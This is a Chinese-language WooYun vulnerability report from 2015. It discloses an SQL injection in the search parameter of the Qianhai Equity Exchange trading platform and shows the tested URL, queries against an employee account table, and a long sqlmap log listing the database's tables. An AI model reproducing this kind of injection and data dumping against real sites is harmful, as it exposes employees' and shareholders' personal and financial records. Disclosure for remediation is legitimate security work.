当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150104

漏洞标题:梧桐小微(前海股权交易中心)SQL注射导致信息泄露

相关厂商:前海股权交易中心

漏洞作者: ksss

提交时间:2015-10-28 18:07

修复时间:2015-12-17 10:14

公开时间:2015-12-17 10:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-28: 细节已通知厂商并且等待厂商处理中
2015-11-02: 厂商已经确认,细节仅向厂商公开
2015-11-12: 细节向核心白帽子及相关领域专家公开
2015-11-22: 细节向普通白帽子公开
2015-12-02: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

用某人的话说就是“涉及近500亿元”

详细说明:

https://**.**.**.**/node/stock-market/plaza/sell


QQ截图20151028145558.png


http://**.**.**.**/bugs/wooyun-2010-0139659这里看到主站一处注入的account表再次躺枪
前海股权交易中心的交易平台,搜索处存在sql注入,抓包抓下来

https://**.**.**.**/node/stock-market/plaza/sell?ent_name=123


QQ截图20151028145752.png


当前库300多张表

QQ截图20151028145850.png


back-end DBMS: MySQL 5.0.11
select count(*) from account: '464'
select * from account limit 0,1: '序号, 邮箱, 部门, 职务/职责, 姓名, 联系电话, 座机, 当前状态, 工号, 邮箱'


第一张account存储了400多个员工的详细信息,包括姓名、职位、工号等等
剩下的表信息巨大比如qhee_ent_apply_listed_stock_holder,存有1万8千条股权持有信息,包括姓名、股权信息啊等等
还有其他的用户账号、交易详情等等,信息巨大

QQ截图20151028150145.png


[11:07:12] [INFO] resumed: qhee_activity_mutiladdress
[11:07:12] [INFO] resumed: qhee_activity_speecher
[11:07:12] [INFO] resumed: qhee_admin_log
[11:07:12] [INFO] resumed: qhee_admin_permission
[11:07:12] [INFO] resumed: qhee_admin_power
[11:07:12] [INFO] resumed: qhee_admin_roles
[11:07:12] [INFO] resumed: qhee_admin_user_role_relations
[11:07:12] [INFO] resumed: qhee_api_logs
[11:07:12] [INFO] resumed: qhee_article_tag_map
[11:07:12] [INFO] resumed: qhee_buzz_statistics
[11:07:12] [INFO] resumed: qhee_cert_info
[11:07:12] [INFO] resumed: qhee_code_equity
[11:07:12] [INFO] resumed: qhee_code_equity_copy_0823
[11:07:12] [INFO] resumed: qhee_code_equity_copy_0930
[11:07:12] [INFO] resumed: qhee_com_custom
[11:07:12] [INFO] resumed: qhee_com_dljz_base
[11:07:13] [INFO] resumed: qhee_com_employee
[11:07:13] [INFO] resumed: qhee_com_gszc_base
[11:07:13] [INFO] resumed: qhee_com_gszc_stock_holder
[11:07:13] [INFO] resumed: qhee_com_order
[11:07:13] [INFO] resumed: qhee_com_pack_product
[11:07:13] [INFO] resumed: qhee_com_product
[11:07:13] [INFO] resumed: qhee_com_services
[11:07:13] [INFO] resumed: qhee_common_comment
[11:07:13] [INFO] resumed: qhee_cooperation_invest_org
[11:07:13] [INFO] resumed: qhee_demand_products
[11:07:13] [INFO] resumed: qhee_ent
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_base
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_block
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_files
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_files_back
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_financial
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_holder
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_init
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_more_block
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_more_pledge
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_person_manage
[11:07:13] [INFO] resumed: qhee_ent_apply_deposit_pledge
[11:07:13] [INFO] resumed: qhee_ent_apply_files_back
[11:07:13] [INFO] resumed: qhee_ent_apply_history
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_20150604
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_20150608
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_20151028
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_bak20140717
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_base_tnp
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_display
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_files
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_files_tmp
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_financial
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_financial_tmp
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_init
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stat
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock_holder
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock_holder_20140821
[11:07:13] [INFO] resumed: qhee_ent_apply_listed_stock_holder_tmp
[11:07:13] [INFO] resumed: qhee_ent_apply_register_101b
[11:07:13] [INFO] resuming partial value: qhee_ent_apply_
[11:16:40] [INFO] retrieved: qhee_ent_call_api_history
[11:26:23] [INFO] retrieved: qhee_ent_disseminates
[11:33:37] [INFO] retrieved: qhee_ent_disseminates_20141021
[11:40:24] [INFO] retrieved: qhee_ent_disseminates_20150522
[11:45:41] [INFO] retrieved: qhee_ent_disseminates_201505221249
[11:50:52] [INFO] retrieved: qhee_ent_edit_reject_history
[12:02:15] [INFO] retrieved: qhee_ent
[12:03:39] [ERROR] invalid character detected. retrying..
[12:03:39] [WARNING] increasing time delay to 4 seconds
_edit_verify_status
[12:14:02] [INFO] retrieved: qhee_ent_edit_verify_status_20150918
[12:21:39] [INFO] retrieved: qhee_ent_edit_verify_status_copy_0820
[12:30:03] [INFO] retrieved: qhee_ent_final
[12:33:49] [INFO] retrieved: qhee_ent_final_20140821
[12:40:11] [INFO] retrieved: qhee_ent_final_2014_0923
[12:45:02] [INFO] retrieved: qhee_ent_final_20150604
[12:49:53] [INFO] retrieved: qhee_ent_final_20150608
[12:53:04] [INFO] retrieved: qhee_ent_final_20150609
[12:56:05] [INFO] retrieved: qhee_ent_final_copy_20140114
[13:04:40] [INFO] retrieved: qhee_ent_news
[13:08:03] [INFO] retrieved: qhee_ent_option_state
[13:15:59] [INFO] retrieved: qhee_ent_patent
[13:20:31] [INFO] retrieved: qhee_ent_patent_20

漏洞证明:

QQ截图20151028145752.png


QQ截图20151028150145.png

修复方案:

过滤

版权声明:转载请注明来源 ksss@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-02 10:13

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价